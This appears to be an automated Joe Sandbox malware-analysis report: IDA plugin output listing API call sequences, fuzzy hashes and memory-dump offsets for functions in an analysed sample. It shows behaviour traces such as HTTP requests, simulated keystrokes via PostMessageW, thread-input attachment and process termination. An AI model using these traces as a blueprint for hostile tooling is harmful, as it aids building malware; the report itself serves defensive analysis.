                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                              • Opcode ID: 0b5c2dfa1aecb9de668ad5fb70ba807bfffedc0649d7bbf44d5448a7ac168b03
                                                                                                                                                                              • Instruction ID: 1b954e7ee385bd7ceedd5e8df6ca5b0fbfeb1be4aed66e9739241b0102fc28bf
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5c2dfa1aecb9de668ad5fb70ba807bfffedc0649d7bbf44d5448a7ac168b03
                                                                                                                                                                              • Instruction Fuzzy Hash: 30218EB5900218BBCF11ABA0DC89EEEBFB8EF15350F405016BA51B71D5CA758859DB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E34539
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E3453C
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E34563
                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E34586
                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E345FE
                                                                                                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E34648
                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E34663
                                                                                                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E3467E
                                                                                                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E34692
                                                                                                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E346AF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: c2517d786a5653ee4cb5988882372f28322ce701c59c5ed1b558626dc8edd2d6
• Instruction ID: 8d48826303cf08cfc4fd441a779d1d2c7224b354ecd91a8aa07cf6ff62488165
• Opcode Fuzzy Hash: c2517d786a5653ee4cb5988882372f28322ce701c59c5ed1b558626dc8edd2d6
• Instruction Fuzzy Hash: C76179B5A00208AFDB10DFA4CC85EEE7BF8EB49314F140159FA15A72E1C774AA49DB60
APIs
• GetCurrentThreadId.KERNEL32 ref: 00E0BB18
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BB2C
• GetWindowThreadProcessId.USER32(00000000), ref: 00E0BB33
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BB42
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00E0BB54
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BB6D
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BB7F
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BBC4
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BBD9
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BBE4
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: ab17eb2e051f8f8570cfea5c5f504404ad2930e12aa3cb3b187d1967afe0b37e
• Instruction ID: 4ba2efff99921a4f071fb2316279e4af0601bcafe4ac2378ad700643fcdc29d4
• Opcode Fuzzy Hash: ab17eb2e051f8f8570cfea5c5f504404ad2930e12aa3cb3b187d1967afe0b37e
• Instruction Fuzzy Hash: 1B3180B1904208AFDB10DB16EC89F697BA9BB54316F114005FA19F61E4D7B498848F61
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DA2AF9
• OleUninitialize.OLE32(?,00000000), ref: 00DA2B98
• UnregisterHotKey.USER32(?), ref: 00DA2D7D
• DestroyWindow.USER32(?), ref: 00DE3A1B
• FreeLibrary.KERNEL32(?), ref: 00DE3A80
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DE3AAD
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 9540512558f3486804aea4708771578b9db73d48238e076654c19421d2fbe4fe
• Instruction ID: a01c50d44c76317d29650c664c03692ecf82dcfeae1f4f58a43d894f531f028e
• Opcode Fuzzy Hash: 9540512558f3486804aea4708771578b9db73d48238e076654c19421d2fbe4fe
• Instruction Fuzzy Hash: 02D13A31605252DFCB19EF1AD849A79F7A0EF05710F1542ADE44AAB262CB31ED52CF60
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E189F2
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E18A06
• GetFileAttributesW.KERNEL32(?), ref: 00E18A30
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00E18A4A
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E18A5C
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E18AA5
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E18AF5
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
• Opcode ID: af89e207eea9a924055e380bf096c21467839f23a8b3cdb033499584e82e0c34
• Instruction ID: f53b42d73a71e42125a61c4ebf7d347eb70c8d0b964e33dc4e153c2720e28896
• Opcode Fuzzy Hash: af89e207eea9a924055e380bf096c21467839f23a8b3cdb033499584e82e0c34
• Instruction Fuzzy Hash: 1381AE719042459FCB24EE14CA44AFAB3E8FF95314F585C2AF889E7250DB34D985CBA2
APIs
• IsWindow.USER32(00000000), ref: 00E38992
• IsWindowEnabled.USER32(00000000), ref: 00E3899E
• SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00E38A79
• SendMessageW.USER32(00000000,000000B0,?,?), ref: 00E38AAC
• IsDlgButtonChecked.USER32(?,00000000), ref: 00E38AE4
• GetWindowLongW.USER32(00000000,000000EC), ref: 00E38B06
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E38B1E
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID: (
• API String ID: 4072528602-2063206799
• Opcode ID: 2dfbc5d1ccfa702f3468b93ff62a76a28147de6120369287e15c71691d329e4b
• Instruction ID: 52105378b0d6b59f23a569b0d52802b5c04a543420befdb25da99f3f30bd9fe3
• Opcode Fuzzy Hash: 2dfbc5d1ccfa702f3468b93ff62a76a28147de6120369287e15c71691d329e4b
• Instruction Fuzzy Hash: D171DD34604308AFDB21DF65CA88FBABFB5EF49304F14245AF99977261CB31A984CB10
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00DA74D7
  • Part of subcall function 00DA7567: GetClientRect.USER32(?,?), ref: 00DA758D
  • Part of subcall function 00DA7567: GetWindowRect.USER32(?,?), ref: 00DA75CE
  • Part of subcall function 00DA7567: ScreenToClient.USER32(?,?), ref: 00DA75F6
• GetDC.USER32 ref: 00DE6083
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DE6096
• SelectObject.GDI32(00000000,00000000), ref: 00DE60A4
• SelectObject.GDI32(00000000,00000000), ref: 00DE60B9
• ReleaseDC.USER32(?,00000000), ref: 00DE60C1
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DE6152
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: f6ee13f3c521d4cc84e07c7b287f6154ec04ebf8ca8e1539b7645df75a5f8e6c
• Instruction ID: e95dadc4a1af682537387e6849c43325ab870a60a9663169420c4bb4e41179bf
• Opcode Fuzzy Hash: f6ee13f3c521d4cc84e07c7b287f6154ec04ebf8ca8e1539b7645df75a5f8e6c
• Instruction Fuzzy Hash: B2710131404245DFCF22EF65CC84AAA7FB1FF593A0F184269ED955A2A6C731C880DB70
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E1CCB7
                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E1CCDF
                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E1CD0F
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E1CD67
                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00E1CD7B
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00E1CD86
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3113390036-3916222277
                                                                                                                                                                              • Opcode ID: 180de7431462c348360be996e933c6d6b960317eda8380943908bf63e015f1ef
                                                                                                                                                                              • Instruction ID: 0c67e8ff429352685e316faabb6d3dd299c3a0e8c102fa59bffe2aa3afb2ec45
                                                                                                                                                                              • Opcode Fuzzy Hash: 180de7431462c348360be996e933c6d6b960317eda8380943908bf63e015f1ef
                                                                                                                                                                              • Instruction Fuzzy Hash: D2317FB1544208AFD721AF65AC88AEB7FFCEB45744B20552EF446E3210DB34DD889B61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DE55AE,?,?,Bad directive syntax error,00E3DCD0,00000000,00000010,?,?), ref: 00E0A236
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00DE55AE,?), ref: 00E0A23D
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E0A301
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                              • API String ID: 858772685-4153970271
                                                                                                                                                                              • Opcode ID: 45ecfa830e0556f15b5f40c7adc990c3315bbd0dd34b5080cfe368e1fe11d2ee
                                                                                                                                                                              • Instruction ID: d5512784f60af14334fa5153ca278a629a8e47fe2bfe249c2acf962b3ec01b1a
                                                                                                                                                                              • Opcode Fuzzy Hash: 45ecfa830e0556f15b5f40c7adc990c3315bbd0dd34b5080cfe368e1fe11d2ee
                                                                                                                                                                              • Instruction Fuzzy Hash: AE21493184431EEBCF11ABA0CC0AEEE7B79FF18304F045465B516760A2EB719658DB31
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32 ref: 00E029F8
                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00E02A0D
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E02A9A
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameParentSend
                                                                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                              • API String ID: 1290815626-3381328864
                                                                                                                                                                              • Opcode ID: 7cf1e2ea02df38b1b5eb1758fc69972a5869f60b562ddfbd3f25ed94c359dd65
                                                                                                                                                                              • Instruction ID: bb3982ae06cc82314ba4ff43039eacf8d178383fcec515270afcb8bdb775f1ec
                                                                                                                                                                              • Opcode Fuzzy Hash: 7cf1e2ea02df38b1b5eb1758fc69972a5869f60b562ddfbd3f25ed94c359dd65
                                                                                                                                                                              • Instruction Fuzzy Hash: 5411C676788307B9FA247621FC0FEA67BECDF15768B20101AFA05F50D1FF6568924524
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00DA758D
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00DA75CE
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00DA75F6
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00DA773A
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00DA775B
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1296646539-0
                                                                                                                                                                              • Opcode ID: fdb8e5737914fa54ccd4125873764aa42bb4ceb3b038e317d743d889053c3d85
                                                                                                                                                                              • Instruction ID: bdd8b11859552edaf71818b2061f6ae662568022c84b7b351302a7d5c50cef8c
                                                                                                                                                                              • Opcode Fuzzy Hash: fdb8e5737914fa54ccd4125873764aa42bb4ceb3b038e317d743d889053c3d85
                                                                                                                                                                              • Instruction Fuzzy Hash: 49C16B39A0464AEFDB10DFA9C940BEDBBF1FF18310F18841AE8A5A7250D734E951DB64
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1282221369-0
                                                                                                                                                                              • Opcode ID: 4fa1e9d8601bcda5f76a4abe40d8809183b1270e9becb0592049cc3a24c6f975
                                                                                                                                                                              • Instruction ID: c6ae9d44c35efbb1f3be13735f40cc32fda0ecfd59c9b8bb59877de7041be2fc
                                                                                                                                                                              • Opcode Fuzzy Hash: 4fa1e9d8601bcda5f76a4abe40d8809183b1270e9becb0592049cc3a24c6f975
                                                                                                                                                                              • Instruction Fuzzy Hash: 8461F771944301AFDF31AFB9D882ABE7BAADF01320F18016FE945A7385D63199448BB5
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E35C24
                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00E35C65
                                                                                                                                                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 00E35C6B
                                                                                                                                                                              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E35C6F
                                                                                                                                                                                • Part of subcall function 00E379F2: DeleteObject.GDI32(00000000), ref: 00E37A1E
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E35CAB
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E35CB8
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E35CEB
                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E35D25
                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E35D34
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3210457359-0
                                                                                                                                                                              • Opcode ID: 496d0f41c3ec017595c565a711a40569c38492406ca5e7ff2f227c9e6768371c
                                                                                                                                                                              • Instruction ID: cbd65b8cfce646c2ffa6458f803c1c85671268c4b47ee2c821e6b7c1b50ce3f0
                                                                                                                                                                              • Opcode Fuzzy Hash: 496d0f41c3ec017595c565a711a40569c38492406ca5e7ff2f227c9e6768371c
                                                                                                                                                                              • Instruction Fuzzy Hash: 4D51AE36640A08BFEF249B25CC4DBD9BFA1EF04758F146112FA24BA3E0C775A990DB51
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E1CBC7
• GetLastError.KERNEL32 ref: 00E1CBDA
• SetEvent.KERNEL32(?), ref: 00E1CBEE
  • Part of subcall function 00E1CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E1CCB7
  • Part of subcall function 00E1CC98: GetLastError.KERNEL32 ref: 00E1CD67
  • Part of subcall function 00E1CC98: SetEvent.KERNEL32(?), ref: 00E1CD7B
  • Part of subcall function 00E1CC98: InternetCloseHandle.WININET(00000000), ref: 00E1CD86
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: 07eb6c56a9e5d78e28f6c619effd3f880f2a5088307196554f14f118d539a769
• Instruction ID: 486bdb7881ebe24db68865ab394e08d04f82c0b70668b191d5fd19c50de96371
• Opcode Fuzzy Hash: 07eb6c56a9e5d78e28f6c619effd3f880f2a5088307196554f14f118d539a769
• Instruction Fuzzy Hash: E8317C71144605AFCB218F61DD48AEBBBE8FF04704B20551EF85AE2610C730DC94EBA0
APIs
  • Part of subcall function 00E04393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E043AD
  • Part of subcall function 00E04393: GetCurrentThreadId.KERNEL32 ref: 00E043B4
  • Part of subcall function 00E04393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E02F00), ref: 00E043BB
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00E02F0A
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E02F28
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E02F2C
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00E02F36
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E02F4E
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E02F52
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00E02F5C
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E02F70
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E02F74
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: 3104ac4c33c9434769422220f068e14618de7193894ff788db59ee8abae51883
• Instruction ID: 3899e466dc0fa71a1e2a130685ee0287d01937078367bec21cfb7bd7d6a4d4fb
• Opcode Fuzzy Hash: 3104ac4c33c9434769422220f068e14618de7193894ff788db59ee8abae51883
• Instruction Fuzzy Hash: D401D8707886147FFB1067699C8EF593F99DB4DB51F101015F318BE1E0C9F254448AA9
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E01D95,?,?,00000000), ref: 00E02159
• HeapAlloc.KERNEL32(00000000,?,00E01D95,?,?,00000000), ref: 00E02160
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E01D95,?,?,00000000), ref: 00E02175
• GetCurrentProcess.KERNEL32(?,00000000,?,00E01D95,?,?,00000000), ref: 00E0217D
• DuplicateHandle.KERNEL32(00000000,?,00E01D95,?,?,00000000), ref: 00E02180
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E01D95,?,?,00000000), ref: 00E02190
• GetCurrentProcess.KERNEL32(00E01D95,00000000,?,00E01D95,?,?,00000000), ref: 00E02198
• DuplicateHandle.KERNEL32(00000000,?,00E01D95,?,?,00000000), ref: 00E0219B
• CreateThread.KERNEL32(00000000,00000000,00E021C1,00000000,00000000,00000000), ref: 00E021B5
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: beb4abc69a7e87ad6b7bfac890ee5b752d0cd5dbab6688587453c77a79e146db
• Instruction ID: a2e92c2dfd1266e5d5a25ef2da814e373949f8ee2aa8f1e84365f3d7b83adc30
• Opcode Fuzzy Hash: beb4abc69a7e87ad6b7bfac890ee5b752d0cd5dbab6688587453c77a79e146db
• Instruction Fuzzy Hash: BE01A8B5245308BFE610ABB6EC4DF6B7BACEB88711F014411FA05EB1A1CA719804DA20
APIs
  • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E0CF99
• _wcslen.LIBCMT ref: 00E0CFE0
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E0D047
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E0D075
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: ,*$0$<*
• API String ID: 1227352736-815946194
• Opcode ID: eae745a587bd844a96ec589892431afc9c1186d4030d6c27d44ebb0690a04034
• Instruction ID: 4ad191ddb70267e0c39ca9d737fab188921008a4a75b6be4605e3edffe02d47c
• Opcode Fuzzy Hash: eae745a587bd844a96ec589892431afc9c1186d4030d6c27d44ebb0690a04034
• Instruction Fuzzy Hash: EB51C3716083029BD7149F68CC45BABBBE9EF85318F041A2DF999F31D1DBB0C9858762
APIs
  • Part of subcall function 00E0DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E0DDAC
  • Part of subcall function 00E0DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E0DDBA
  • Part of subcall function 00E0DD87: CloseHandle.KERNEL32(00000000), ref: 00E0DE87
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2ABCA
• GetLastError.KERNEL32 ref: 00E2ABDD
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2AC10
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00E2ACC5
• GetLastError.KERNEL32(00000000), ref: 00E2ACD0
• CloseHandle.KERNEL32(00000000), ref: 00E2AD21
